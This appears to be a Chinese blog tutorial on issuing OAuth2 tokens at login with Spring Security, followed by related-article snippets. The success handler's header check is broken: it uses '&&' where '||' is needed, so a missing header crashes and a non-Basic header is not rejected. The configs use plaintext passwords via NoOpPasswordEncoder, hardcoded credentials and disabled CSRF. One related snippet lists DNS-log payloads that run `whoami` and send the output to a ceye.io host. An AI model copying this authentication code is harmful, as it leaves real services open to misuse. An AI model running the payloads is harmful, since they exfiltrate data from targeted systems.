传统的应用是将Session放在应用服务器上,而将生成的JSESSIONID放在用户浏览器的Cookie中,而这种模式在前后端分离中就会出现以下问题

    1,开发繁琐。

    2,安全性和客户体验差

    3,有些前端技术不支持Cookie,如微信小程序

  这种情况下,前后端之间使用Token(令牌)进行通信就完美的解决上面的问题。

⒈添加pom依赖

         <dependency>

             <groupId>org.springframework.boot</groupId>

             <artifactId>spring-boot-starter-security</artifactId>

         </dependency>

         <dependency>

             <groupId>org.springframework.boot</groupId>

             <artifactId>spring-boot-starter-web</artifactId>

         </dependency>

         <dependency>

             <groupId>org.springframework.security.oauth</groupId>

             <artifactId>spring-security-oauth2</artifactId>

             <version>2.3.5.RELEASE</version>

         </dependency>

         <dependency>

             <groupId>commons-collections</groupId>

             <artifactId>commons-collections</artifactId>

             <version>3.2.2</version>

         </dependency>

         <dependency>

             <groupId>org.springframework.boot</groupId>

             <artifactId>spring-boot-starter-test</artifactId>

             <scope>test</scope>

         </dependency>

         <dependency>

             <groupId>org.springframework.security</groupId>

             <artifactId>spring-security-test</artifactId>

             <scope>test</scope>

         </dependency>

⒉编写AuthenticationSuccessHandler的实现

 package cn.coreqi.handler;

 import com.fasterxml.jackson.databind.ObjectMapper;

 import org.apache.commons.codec.binary.StringUtils;

 import org.apache.commons.collections.MapUtils;

 import org.slf4j.Logger;

 import org.slf4j.LoggerFactory;

 import org.springframework.beans.factory.annotation.Autowired;

 import org.springframework.security.authentication.BadCredentialsException;

 import org.springframework.security.core.Authentication;

 import org.springframework.security.oauth2.common.OAuth2AccessToken;

 import org.springframework.security.oauth2.common.exceptions.UnapprovedClientAuthenticationException;

 import org.springframework.security.oauth2.provider.*;

 import org.springframework.security.oauth2.provider.token.AuthorizationServerTokenServices;

 import org.springframework.security.web.authentication.AuthenticationSuccessHandler;

 import org.springframework.stereotype.Component;

 import javax.servlet.ServletException;

 import javax.servlet.http.HttpServletRequest;

 import javax.servlet.http.HttpServletResponse;

 import java.io.IOException;

 import java.util.Base64;

 @Component("coreqiAuthenticationSuccessHandler")

 public class CoreqiAuthenticationSuccessHandler implements AuthenticationSuccessHandler {

     private Logger logger = LoggerFactory.getLogger(getClass());

     @Autowired

     private ClientDetailsService clientDetailsService;

     @Autowired

     private AuthorizationServerTokenServices authorizationServerTokenServices;

     @Autowired

     private ObjectMapper objectMapper;  //将对象转换为Json的工具类,SpringMVC在启动的时候会自动为我们注册ObjectMapper

     /**

      * @param request    不知道

      * @param response   不知道

      * @param authentication   Authentication接口是SpringSecurity的一个核心接口,它的作用是封装我们的认证信息,包含认证请求中的一些信息,包括认证请求的ip,Session是什么,以及认证用户的信息等等。

      * @throws IOException

      * @throws ServletException

      */

     @Override

     public void onAuthenticationSuccess(HttpServletRequest request, HttpServletResponse response, Authentication authentication) throws IOException, ServletException {

         //1.从请求参数中拿到ClientId

         String header = request.getHeader("Authorization");

         if (header == null && !header.toLowerCase().startsWith("basic ")) {

             throw new UnapprovedClientAuthenticationException("请求头中无client信息!");

         }

         String[] tokens = this.extractAndDecodeHeader(header, request);

         assert tokens.length == 2;

         String clientId = tokens[0];

         String clientSecret = tokens[1];

         //2.通过ClientId拿到ClientDetails

         ClientDetails clientDetails = clientDetailsService.loadClientByClientId(clientId);

         if(clientDetails == null){

             throw new UnapprovedClientAuthenticationException("clientId对应的配置信息不存在:" + clientId);

         }else if(!StringUtils.equals(clientDetails.getClientSecret(),clientSecret)){

             throw new UnapprovedClientAuthenticationException("clientSecret不匹配:" + clientId);

         }

         //3.创建TokenRequest

         TokenRequest tokenRequest = new TokenRequest(MapUtils.EMPTY_MAP,clientId,clientDetails.getScope(),"custom");

         //4.构建OAuth2Request

         OAuth2Request oAuth2Request = tokenRequest.createOAuth2Request(clientDetails);

         //5.构建OAuth2Authentication

         OAuth2Authentication oAuth2Authentication = new OAuth2Authentication(oAuth2Request,authentication);

         //6.构建OAuth2AccessToken

         OAuth2AccessToken token = authorizationServerTokenServices.createAccessToken(oAuth2Authentication);

         //7.将生成的Token返回给请求

         response.setContentType("application/json;charset=UTF-8");

         response.getWriter().write(objectMapper.writeValueAsString(token));

     }

     /**

      * 从请求头中解析用户名密码

      * @param header

      * @param request

      * @return

      * @throws IOException

      */

     private String[] extractAndDecodeHeader(String header, HttpServletRequest request) throws IOException {

         byte[] base64Token = header.substring(6).getBytes("UTF-8");

         byte[] decoded;

         try {

             decoded = Base64.getDecoder().decode(base64Token);

         } catch (IllegalArgumentException var7) {

             throw new BadCredentialsException("Failed to decode basic authentication token");

         }

         String token = new String(decoded, "UTF-8");

         int delim = token.indexOf(":");

         if (delim == -1) {

             throw new BadCredentialsException("Invalid basic authentication token");

         } else {

             return new String[]{token.substring(0, delim), token.substring(delim + 1)};

         }

     }

 }

⒊配置Security

 package cn.coreqi.config;

 import org.springframework.context.annotation.Bean;

 import org.springframework.security.authentication.AuthenticationManager;

 import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;

 import org.springframework.security.config.annotation.web.builders.HttpSecurity;

 import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;

 import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;

 import org.springframework.security.crypto.password.NoOpPasswordEncoder;

 import org.springframework.security.crypto.password.PasswordEncoder;

 @EnableWebSecurity

 public class CoreqiWebSecurityConfig extends WebSecurityConfigurerAdapter {

     @Override

     @Bean

     public AuthenticationManager authenticationManagerBean() throws Exception {

         return super.authenticationManagerBean();

     }

     @Override

     protected void configure(HttpSecurity http) throws Exception {

         http.httpBasic()

                 .and()

                 .authorizeRequests()

                 .antMatchers("/oauth/token","/login").permitAll()

                 .anyRequest().authenticated()  //任何请求都需要身份认证

                 .and().csrf().disable();    //禁用CSRF

     }

     @Override

     protected void configure(AuthenticationManagerBuilder auth) throws Exception {

         auth.inMemoryAuthentication()

                 .withUser("fanqi").password("admin").roles("admin");

     }

     @Bean

     public PasswordEncoder passwordEncoder()

     {

         return NoOpPasswordEncoder.getInstance();

     }

 }

⒋配置OAuth2

 package cn.coreqi.config;

 import org.springframework.beans.factory.annotation.Autowired;

 import org.springframework.beans.factory.annotation.Qualifier;

 import org.springframework.context.annotation.Configuration;

 import org.springframework.security.authentication.AuthenticationManager;

 import org.springframework.security.config.annotation.authentication.configuration.AuthenticationConfiguration;

 import org.springframework.security.oauth2.config.annotation.configurers.ClientDetailsServiceConfigurer;

 import org.springframework.security.oauth2.config.annotation.web.configuration.AuthorizationServerConfigurerAdapter;

 import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer;

 import org.springframework.security.oauth2.config.annotation.web.configurers.AuthorizationServerEndpointsConfigurer;

 @Configuration

 @EnableAuthorizationServer  //开启认证服务器

 public class CoreqiAuthorizationServerConfig extends AuthorizationServerConfigurerAdapter {

     @Autowired

     @Qualifier("authenticationManagerBean")

     private AuthenticationManager authenticationManager;

     @Autowired

     private AuthenticationConfiguration authenticationConfiguration;

     /**

      * password模式需要提供一个AuthenticationManager到AuthorizationServerEndpointsConfigurer

      * @param authorizationServerEndpointsConfigurer

      * @throws Exception

      */

     @Override

     public void configure(AuthorizationServerEndpointsConfigurer authorizationServerEndpointsConfigurer) throws Exception {

         authorizationServerEndpointsConfigurer.authenticationManager(authenticationConfiguration.getAuthenticationManager());

     }

     @Override

     public void configure(ClientDetailsServiceConfigurer clientDetailsServiceConfigurer) throws Exception {

         clientDetailsServiceConfigurer.inMemory()

                 .withClient("coreqi")

                 .secret("coreqiSecret")

                 .redirectUris("https://www.baidu.com")

                 .scopes("ALL")

                 .authorities("COREQI_READ")

                 .authorizedGrantTypes("authorization_code","password");

     }

 }

⒌配置资源服务器

 package cn.coreqi.config;

 import cn.coreqi.handler.CoreqiAuthenticationSuccessHandler;

 import org.springframework.beans.factory.annotation.Autowired;

 import org.springframework.context.annotation.Configuration;

 import org.springframework.security.config.annotation.web.builders.HttpSecurity;

 import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer;

 import org.springframework.security.oauth2.config.annotation.web.configuration.ResourceServerConfigurerAdapter;

 import org.springframework.security.oauth2.config.annotation.web.configurers.ResourceServerSecurityConfigurer;

 @Configuration

 @EnableResourceServer   //开启资源服务器

 public class CoreqiResourceServerConfig extends ResourceServerConfigurerAdapter {

     @Autowired

     private CoreqiAuthenticationSuccessHandler coreqiAuthenticationSuccessHandler;

     @Override

     public void configure(HttpSecurity http) throws Exception {

         http.formLogin()

                 .successHandler(coreqiAuthenticationSuccessHandler)

             .and()

             .authorizeRequests()

                 .antMatchers("/oauth/token","/login").permitAll()

                 .anyRequest().authenticated()  //任何请求都需要身份认证

             .and()

             .csrf()

                 .disable();    //禁用CSRF

     }

 }

⒍测试

    

SpringSecurity实现用户名密码登录(Token)的更多相关文章

  1. Python用户名密码登录系统(MD5加密并存入文件,三次输入错误将被锁定)及对字符串进行凯撒密码加解密操作

    # -*- coding: gb2312 -*- #用户名密码登录系统(MD5加密并存入文件)及对字符串进行凯撒密码加解密操作 #作者:凯鲁嘎吉 - 博客园 http://www.cnblogs.co ...

  2. pyhton学习,day1作业,用户名密码登录模块

    要求,通过用户名密码登录,登录错误3次,锁定用户名 # coding=utf-8 # Author: RyAn Bi import os, sys #调用系统自己的库 accounts_file = ...

  3. cassandra根据用户名密码登录cqlsh

     修改conf目录下cassandra.yaml文件 authenticator: PasswordAuthenticator //将authenticator修改为PasswordAuthentic ...

  4. 用户名密码登录小程序及input与raw_input区别。

    一.此次程序需要实现: 1.设定固定的用户名密码 2.用户名密码输入正确打印登录正确信息 3.仅仅运行三次登录 二.本次使用的python版本为: Windows下版本号: C:\Users\dais ...

  5. Spring Security之用户名+密码登录

    自定义用户认证逻辑 处理用户信息获取逻辑 实现UserDetailsService接口 @Service public class MyUserDetailsService implements Us ...

  6. 【Python练习】文件引用用户名密码登录系统

    一.通过txt文件引入用户名密码 1 #coding=utf-8 from selenium import webdriver #from selenium.common.exceptions imp ...

  7. 【转】IIS网站浏览时提示需要用户名密码登录-解决方法

    打开iis,站点右键----属性----目录安全性----编辑----允许匿名访问钩选 IIS连接127.0.0.1要输入用户名密码的解决办法原因很多,请尝试以下操作: 1.查看网站属性——文档看看启 ...

  8. MongoDB 用户名密码登录

    Mongodb enable authentication MongoDB 默认直接连接,无须身份验证,如果当前机器可以公网访问,且不注意Mongodb 端口(默认 27017)的开放状态,那么Mon ...

  9. 亚马逊AWS CentOS7(linux)改为用户名密码登录

    1.进入AWS系统 略 系统为:centos 7 fox.风 2.设置ROOT密码 sudo passwd root 1 3.修改配置文件 sudo vim /etc/ssh/sshd_config ...

随机推荐

  1. mysql如何从全备文件中恢复单个库或者单个表

    mysql如何从全备文件中恢复单个库或者单个表 在mysql dba的日常实际工作中,一个实例下有多个库,而我们常见的备份就是全库备份.那么问题就来了,如果需要恢复单个库或者单个表,怎么办了,网上有很 ...

  2. 数据库中in和exists关键字的区别

    数据库中in和exists关键字的区别 in 是把外表和内表作hash join,而exists是对外表作loop,每次loop再对内表进行查询. 一直以来认为exists比in效率高的说法是不准确的 ...

  3. SVN简单的使用

    一.什么是SVN有什么用? SVN是Subversion的简称,是一个开放源代码的版本控制系统.主要是用于团队开发中的资源共享和团队协作. 二.SVN服务器的安装 1.下载安装文件 在下面地址下载Vi ...

  4. 1.单件模式(Singleton Pattern)

    创建型模式---单件模式(Singleton Pattern)动机(Motivation):    在软件系统中,经常有这样一些特殊的类,必须保证它们在系统中只存在一个实例,才能确保它们的逻辑正确性. ...

  5. DNSLOG的Payload

    命令执行处 linux curl http://ip.port.b182oj.ceye.io/`whoami` ping `whoami`.ip.port.b182oj.ceye.io windows ...

  6. maven项目的聚合与继承

    maven项目的聚合与继承: 一.聚合 如果我们想一次构建多个项目模块,那我们就需要对多个项目模块进行聚合 1.1.聚合配置代码 1 <modules> 2 <module>模 ...

  7. [Android] Android读取Asset下文件的最简单的方法总结(用于MediaPlayer中)

    方法一:getAssets().openFd //读取asset内容    private void openAssetMusic(String index) throws IOException { ...

  8. tomcat配置context的crossContext属性应用案例

    在tomcat下,context元素有一个crossContext属性,如果配置为true,则可以实现在同一个tomcat下的多个web应用之间实现ServletContext对象访问.该属性主要用于 ...

  9. 使用JAVA数组实现顺序表

    1,引入了JAVA泛型类,因此定义了一个Object[] 类型的数组,从而可以保存各种不同类型的对象. 2,默认构造方法创建了一个默认大小为16的Object数组:带参数的构造方法创建一个指定长度的O ...

  10. 双系统中卸载Ubuntu后又efi系统分区删除方法

    参考:https://blog.csdn.net/qq_28057541/article/details/51723914 首先 window键(窗口键) + R ,然后输入 Diskpart 打开命 ...